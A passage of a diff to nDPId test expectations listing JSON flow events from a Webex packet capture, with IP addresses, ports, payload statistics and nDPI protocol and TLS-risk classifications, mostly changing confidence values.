{"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636248,"flow_last_seen":1444570639255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636255,"flow_last_seen":1444570639258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":7052,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00665{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636248,"flow_last_seen":1444570639255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570632436,"flow_last_seen":1444570633205,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":4426,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570638225,"flow_last_seen":1444570642072,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":5437,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636359,"flow_last_seen":1444570639256,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570632436,"flow_last_seen":1444570633205,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":4426,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570638225,"flow_last_seen":1444570642072,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":5437,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636359,"flow_last_seen":1444570639256,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640330,"flow_last_seen":1444570670371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640338,"flow_last_seen":1444570670373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":105,"flow_first_seen":1444570669736,"flow_last_seen":1444570738301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":13596,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":513,"flow_first_seen":1444570669745,"flow_last_seen":1444570732084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29642,"flow_tot_l4_payload_len":316364,"flow_avg_l4_payload_len":616,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570674487,"flow_last_seen":1444570675890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1444570679512,"flow_last_seen":1444570680667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":5379,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570693238,"flow_last_seen":1444570694561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":105,"flow_first_seen":1444570669736,"flow_last_seen":1444570738301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":13596,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":513,"flow_first_seen":1444570669745,"flow_last_seen":1444570732084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29642,"flow_tot_l4_payload_len":316364,"flow_avg_l4_payload_len":616,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570674487,"flow_last_seen":1444570675890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1444570679512,"flow_last_seen":1444570680667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":5379,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570693238,"flow_last_seen":1444570694561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570732086,"flow_last_seen":1444570734115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570712008,"flow_last_seen":1444570716597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570712008,"flow_last_seen":1444570716597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570640382,"flow_last_seen":1444570699865,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00920{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1444570738415,"flow_last_seen":1444570742172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14319,"flow_tot_l4_payload_len":34572,"flow_avg_l4_payload_len":1440,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570640385,"flow_last_seen":1444570699915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00920{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1444570738415,"flow_last_seen":1444570742172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14319,"flow_tot_l4_payload_len":34572,"flow_avg_l4_payload_len":1440,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570640385,"flow_last_seen":1444570699915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570636364,"flow_last_seen":1444570640403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS 